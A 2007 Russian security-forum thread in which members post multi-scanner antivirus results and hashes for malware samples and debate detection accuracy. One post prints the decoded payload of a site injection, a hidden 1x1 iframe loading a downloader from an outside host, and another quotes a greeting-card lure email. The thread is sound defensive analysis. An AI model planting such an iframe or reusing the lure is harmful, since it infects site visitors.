Исследование антивирусов 5

Printable View

Показывать 40 сообщений этой темы на одной странице

18.07.2007, 04:45
Muzzle

из темы [url]http://virusinfo.info/showthread.php?t=11088[/url]
патченый [B]ntoskrnl.exe
[/B]
[QUOTE]AhnLab-V3 2007.7.14.0 2007.07.17 no virus found
AntiVir 7.4.0.42 2007.07.17 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.17 no virus found
DrWeb 4.33 2007.07.18 no virus found
[B]eSafe 7.0.15.0 2007.07.17 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.17 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.17 no virus found
[B]Kaspersky 4.0.2.24 2007.07.18 Virus.Win32.Sosisko.a[/B]
McAfee 5076 2007.07.17 no virus found
Microsoft 1.2704 2007.07.17 no virus found
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 suspected of Embedded.SpamTool.Win32.Agent.u[/B]
VirusBuster 4.3.23:9 2007.07.17 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.17 Win32.Malware.gen!90 (suspicious)[/B][/QUOTE]
18.07.2007, 10:13
Winsent

File index.rar received on 07.18.2007 08:11:48 (CET)
Current status: finished

Antivirus Version Last Update Result

AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
[B]AntiVir 7.4.0.42 2007.07.17 EXP/VML-Fill.A[/B]
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
[B]Fortinet 2.91.0.0 2007.07.18 JS/WebAttacker!exploit[/B]
F-Prot 4.3.2.48 2007.07.17 no virus found
[B]F-Secure 6.70.13030.0 2007.07.17 Trojan-Downloader.JS.Psyme.hu
Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.JS.Psyme.hu
Kaspersky 4.0.2.24 2007.07.18 Trojan-Downloader.JS.Psyme.hu
McAfee 5076 2007.07.17 JS/Downloader-AUD
Microsoft 1.2704 2007.07.17 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
[B]TheHacker 6.1.7.148 2007.07.16 Trojan/Downloader.vbs[/B]
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Psyme.DD.Gen
Webwasher-Gateway 6.0.1 2007.07.17 Exploit.VML-Fill.A[/B]
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143
18.07.2007, 16:17
icon

Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: Loading ... finished
Loading server information...

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.18 no virus found
Kaspersky 4.0.2.24 2007.07.18 no virus found
McAfee 5076 2007.07.17 no virus found
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29

[size="1"][color="#666686"][B]Добавлено через 4 часа 2 минуты[/B][/color][/size]
Из [URL="http://virusinfo.info/showthread.php?p=123479#post123479"]темы[/URL]

File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: Loading ... finished
Loading server information...

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
[B]Avast 4.7.997.0 2007.07.17 Win32:Small-GYA[/B]
AVG 7.5.0.476 2007.07.17 no virus found
[B]BitDefender 7.2 2007.07.17 Dropped:Trojan.Downloader.Small.AET[/B]
[B]CAT-QuickHeal 9.00 2007.07.17 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 no virus found
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3791 2007.07.18 no virus found
Ewido 4.0 2007.07.18 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.18 no virus found
[B]Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.Win32.Small.ehu[/B]
Kaspersky 4.0.2.24 2007.07.18 no virus found
[B]McAfee 5076 2007.07.17 Generic Downloader[/B]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:Win32/Agent.WX[/B]
[B]NOD32v2 2404 2007.07.17 probably a variant of Win32/TrojanDownloader.Small.DRU[/B]
Norman 5.80.02 2007.07.18 no virus found
[B]Panda 9.0.0.4 2007.07.18 Suspicious file[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/Packer[/B]
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 Trojan.Win32.TrojanDownloader.Small.DRU[/B]
VirusBuster 4.3.23:9 2007.07.17
[B]Webwasher-Gateway 6.0.1 2007.07.18 Packer.FSG[/B]
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
18.07.2007, 17:10
DVi

[quote=icon;123441]Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)

[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
[/quote]

Позволю себе усомниться в этом детекте. Все, что делает этот "вредоносный скрипт", это пишет в документ строку
[code]<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>[/code], то есть является пускачом для расположенного по указанному адресу классического Psyme. Сам по себе этот скрипт безвреден. По сути, мы наблюдаем классический инжект в сайт, а DrWeb положил маску на яваскрипт-пакер. Вот такие детекты являются более правильными (хотя все равно - некорректными для статистики Вирусинфо):
[quote=icon;123441]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
[/quote]
19.07.2007, 23:23
XL

[QUOTE]File ecard.exe received on 07.19.2007 21:15:51 (CET)
Current status: finished

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.20.0 2007.07.19 no virus found
[B]AntiVir 7.4.0.44 2007.07.19 WORM/Zhelatin.Gen[/B]
Authentium 4.93.8 2007.07.19 no virus found
[B]Avast 4.7.997.0 2007.07.19 Win32:Tibs-BBG[/B]
AVG 7.5.0.476 2007.07.19 no virus found
[B]BitDefender 7.2 2007.07.19 Trojan.Peed.IAM
CAT-QuickHeal 9.00 2007.07.19 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.19 no virus found
DrWeb 4.33 2007.07.19 no virus found
[B]eSafe 7.0.15.0 2007.07.19 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3794 2007.07.19 no virus found
Ewido 4.0 2007.07.19 no virus found
FileAdvisor 1 2007.07.19 no virus found
Fortinet 2.91.0.0 2007.07.19 no virus found
F-Prot 4.3.2.48 2007.07.19 no virus found
F-Secure 6.70.13030.0 2007.07.19 no virus found
Ikarus T3.1.1.8 2007.07.19 no virus found
Kaspersky 4.0.2.24 2007.07.19 no virus found
McAfee 5078 2007.07.19 no virus found
[B]Microsoft 1.2704 2007.07.19 Trojan:Win32/Tibs.Q[/B]
NOD32v2 2408 2007.07.19 no virus found
Norman 5.80.02 2007.07.19 no virus found
Panda 9.0.0.4 2007.07.19 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Dorf-A[/B]
Sunbelt 2.2.907.0 2007.07.19 no virus found
[B]Symantec 10 2007.07.19 Trojan.Packed.13[/B]
TheHacker 6.1.7.149 2007.07.18 no virus found
VBA32 3.12.2.1 2007.07.19 no virus found
VirusBuster 4.3.26:9 2007.07.19 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.19 Worm.Zhelatin.Gen[/B]
Aditional information
File size: 139173 bytes
MD5: 765922b7967bc7b832a2a4c89dce3068
SHA1: b57ce29554bb404c236fc864cf586ca582f967fb[/QUOTE]

Седьмой KIS последнего билда тоже не детектит в режиме максимальной эвристики, хотя еще пару дней назад файлы из аналогичных писем ловились как [B]trojan.generic[/B]
А писем такого рода приходит по 5-10 шт. в день:
[QUOTE]Hi. School mate has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:

[url]http://72.230.33.160/*****************[/url]

Or copy and paste it into your browser's "Location" box (where Internet addresses go).

We hope you enjoy your awesome card.

Wishing you the best,
Webmaster,
greetingcard.org[/QUOTE]
20.07.2007, 01:47
Helgin

В защиту Microsoft -)

Antivirus Version Last Update Result
AhnLab-V32007.7.20.02007.07.19no virus found
[B]AntiVir[/B][B]7.4.0.44[/B][B]2007.07.19[/B][B]WORM/Zhelatin.Gen[/B]
Authentium4.93.82007.07.19no virus found
[B]Avast[/B][B]4.7.997.0[/B][B]2007.07.19[/B][B]Win32:Tibs-BBG[/B]
AVG7.5.0.4762007.07.18no virus found
[B]BitDefender[/B][B]7.2[/B][B]2007.07.19[/B][B]Trojan.Peed.IAM[/B]
CAT-QuickHeal9.002007.07.19(Suspicious) - DNAScan
ClamAVdevel-200704162007.07.19 no virus found
DrWeb4.332007.07.19no virus found
[B]eSafe[/B][B]7.0.15.0[/B][B]2007.07.17[/B][B]Suspicious Trojan/Worm[/B]
[B]eTrust-Vet[/B][B]30.8.3794[/B][B]2007.07.19[/B][B]Win32/Sintun[/B]
Ewido4.02007.07.19no virus found
FileAdvisor12007.07.19no virus found
Fortinet2.91.0.02007.07.19no virus found
F-Prot4.3.2.482007.07.19no virus found
F-Secure6.70.13030.02007.07.19no virus found
IkarusT3.1.1.82007.07.19no virus found
Kaspersky4.0.2.242007.07.19no virus found
McAfee50782007.07.19no virus found
[COLOR=Red][B]Microsoft[/B][/COLOR][COLOR=Red][B]1.2704[/B][/COLOR][COLOR=Red][B]2007.07.19[/B][/COLOR][COLOR=Red][B]TrojanDropper:Win32/Tibs.O[/B][/COLOR]
NOD32v224072007.07.19no virus found
Norman5.80.022007.07.19no virus found
Panda9.0.0.42007.07.19no virus found
[B]Sophos[/B][B]4.19.0[/B][B]2007.07.17[/B][B]Mal/Dorf-A[/B]
Sunbelt2.2.907.02007.07.19no virus found
[B]Symantec[/B][B]10[/B][B]2007.07.19[/B][B]Trojan.Packed.13[/B]
TheHacker6.1.7.1492007.07.18no virus found
VBA323.12.2.12007.07.19no virus found
VirusBuster4.3.26:92007.07.19no virus found
[B]Webwasher-Gateway[/B][B]6.0.1[/B][B]2007.07.19[/B][B]Worm.Zhelatin.Gen[/B]
21.07.2007, 13:43
mayas

поймал ручками в \system32\drivers

File firelm01.sys received on 07.21.2007 11:37:32 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
[B]Kaspersky 4.0.2.24 2007.07.21 Backdoor.Win32.Hackdoor.g[/B]
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 no virus found
NOD32v2 2410 2007.07.20 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 no virus found
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 no virus found

Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd

add:[QUOTE]мой пост [url]http://virusinfo.info/showpost.php?p...&postcount=227[/url]
ошибка вирусного аналитика ЛК (я отослал в вирлаб, пришел ответ что найдено новое вредоносное программное обеспечение)а это компонент файрвола [/QUOTE]
21.07.2007, 15:26
Макcим

File avz00001.dta received on 07.21.2007 13:12:23 (CET)[QUOTE]AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
[B]BitDefender 7.2 2007.07.21 Trojan.Rootkit.Loader.A[/B]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
[B]eTrust-Vet 30.8.3797 2007.07.20 Win32/Higlieder.AI[/B]
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
[B]Ikarus T3.1.1.8 2007.07.21 Trojan.Rootkit.Loader.A[/B]
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[B]Microsoft 1.2704 2007.07.21 VirTool:WinNT/Higlieder.E
NOD32v2 2410 2007.07.20 Win32/Bagle.IX[/B]
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen (suspicious)[/B][/QUOTE]
22.07.2007, 02:49
Muffler

File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
[B][COLOR="Red"][COLOR="Red"]Fortinet 2.91.0.0 2007.07.21 RKRustok.A[/COLOR][/COLOR][/B]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[COLOR="Red"][B]Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock.gen!C[/B][/COLOR]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.21 Rootkit/NetFrame
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock[/B][/COLOR]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen!82 [/COLOR][/B](suspicious)
[/QUOTE]
Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

[size="1"][color="#666686"][B]Добавлено через 3 часа 21 минуту[/B][/color][/size]
File avz00002.dta received on 07.22.2007 00:45:31 (CET)

[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[COLOR="Red"][B]AntiVir 7.4.0.44 2007.07.21 TR/Rootkit.Gen[/B][/COLOR]
Authentium 4.93.8 2007.07.20 no virus found
[COLOR="Red"][B]Avast 4.7.997.0 2007.07.20 Win32:Trojan-gen. {Other}[/B][/COLOR]
AVG 7.5.0.476 2007.07.21 no virus found
[COLOR="Red"][B]BitDefender 7.2 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
[COLOR="Red"][B]eSafe 7.0.15.0 2007.07.19 Win32.Rustock.B[/B][/COLOR]
eTrust-Vet 30.8.3797 2007.07.20 no virus found
[COLOR="Red"][B]Ewido 4.0 2007.07.21 Rootkit.Small[/B][/COLOR]
FileAdvisor 1 2007.07.22 no virus found
[COLOR="Red"][B]Fortinet 2.91.0.0 2007.07.21 W32/RUSTOCK.AM!tr.bdr[/B][/COLOR]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[COLOR="Red"][B]Ikarus T3.1.1.8 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
Kaspersky 4.0.2.24 2007.07.22 no virus found
[B][COLOR="Red"]McAfee 5079 2007.07.20 Spam-Mailbot.c!Rootkit
Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock[/COLOR][/B]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.22 Trj/Clicker.WM
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock
Symantec 10 2007.07.22 Backdoor.Rustock.B[/B][/COLOR]
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.22 Trojan.Rootkit.Gen[/COLOR][/B][/QUOTE]

Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.
22.07.2007, 12:13
Winsent

File 1.exe received on 07.22.2007 10:10:16 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[B]AntiVir 7.4.0.44 2007.07.21 HEUR/Malware[/B]
Authentium 4.93.8 2007.07.20 no virus found
[B]Avast 4.7.997.0 2007.07.22 Win32:Delf-CAT[/B]
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.22 no virus found
[B]CAT-QuickHeal 9.00 2007.07.20 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.22 no virus found
Fortinet 2.91.0.0 2007.07.22 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[B]Ikarus T3.1.1.8 2007.07.22 Trojan-PWS.Win32.Kapod[/B]
Kaspersky 4.0.2.24 2007.07.22 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.22 no virus found
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[B]Panda 9.0.0.4 2007.07.22 Suspicious file[/B]
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.22 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.22 Heuristic.Malware[/B]

Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
25.07.2007, 07:55
kvit

Antivirus Version Last Update Result
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found
AntiVir 7.4.0.44 2007.07.24 no virus found
Authentium 4.93.8 2007.07.25 no virus found
[B]Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other}
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE [/B]
CAT-QuickHeal 9.00 2007.07.24 no virus found
ClamAV devel-20070416 2007.07.25 no virus found
DrWeb 4.33 2007.07.25 no virus found
eSafe 7.0.15.0 2007.07.24 no virus found
eTrust-Vet 31.1.5003 2007.07.24 no virus found
Ewido 4.0 2007.07.24 no virus found
FileAdvisor 1 2007.07.25 no virus found
Fortinet 2.91.0.0 2007.07.25 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
[B]F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
Ikarus T3.1.1.8 2007.07.24 no virus found
[B]Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
McAfee 5081 2007.07.24 no virus found
[B]Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob[/B]
NOD32v2 2418 2007.07.25 no virus found
[B]Norman 5.80.02 2007.07.24 DNSChanger.gen10[/B]
Panda 9.0.0.4 2007.07.24 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Zlob-A [/B]
Sunbelt 2.2.907.0 2007.07.25 no virus found
Symantec 10 2007.07.25 no virus found
TheHacker 6.1.7.152 2007.07.23 no virus found
VBA32 3.12.2.1 2007.07.24 no virus found
VirusBuster 4.3.26:9 2007.07.24 no virus found
Webwasher-Gateway 6.0.1 2007.07.25 no virus found

[size="1"][color="#666686"][B]Добавлено через 2 минуты[/B][/color][/size]
+ тоже самое с сайта Касперского

Проверенный файл: setup.exe - Инфицирован

setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
[B]setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn[/B]
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке
26.07.2007, 08:27
Muffler

File svc.exe received on 07.26.2007 06:25:17 (CET)

[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.26.0 2007.07.25 no virus found
[B]AntiVir 7.4.0.50 2007.07.25 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.25 no virus found
Avast 4.7.997.0 2007.07.26 no virus found
AVG 7.5.0.476 2007.07.25 no virus found
BitDefender 7.2 2007.07.26 no virus found
[B]CAT-QuickHeal 9.00 2007.07.25 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.26 no virus found
DrWeb 4.33 2007.07.26 no virus found
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5004 2007.07.25 no virus found
Ewido 4.0 2007.07.25 no virus found
FileAdvisor 1 2007.07.26 no virus found
Fortinet 2.91.0.0 2007.07.26 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
F-Secure 6.70.13030.0 2007.07.26 no virus found
Ikarus T3.1.1.8 2007.07.25 no virus found
Kaspersky 4.0.2.24 2007.07.26 no virus found
McAfee 5083 2007.07.26 no virus found
Microsoft 1.2704 2007.07.25 no virus found
NOD32v2 2421 2007.07.26 no virus found
Norman 5.80.02 2007.07.25 no virus found
Panda 9.0.0.4 2007.07.26 Suspicious file
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.26 no virus found
Symantec 10 2007.07.26 no virus found
TheHacker 6.1.7.153 2007.07.25 no virus found
[B]VBA32 3.12.2.1 2007.07.24 suspected of Embedded.Trojan-Downloader.Win32.Small.dge[/B]
VirusBuster 4.3.26:9 2007.07.25 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.26 Win32.NewMalware.BA!4538!2[/B][/QUOTE]
Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34
26.07.2007, 18:48
Kuzz

[url]http://virusinfo.info/showthread.php?t=11350[/url]

[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 PSW.Generic4.ZKV
BitDefender 7.2 2007.07.26 MemScan:Trojan.Spy.Nuklus.D
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
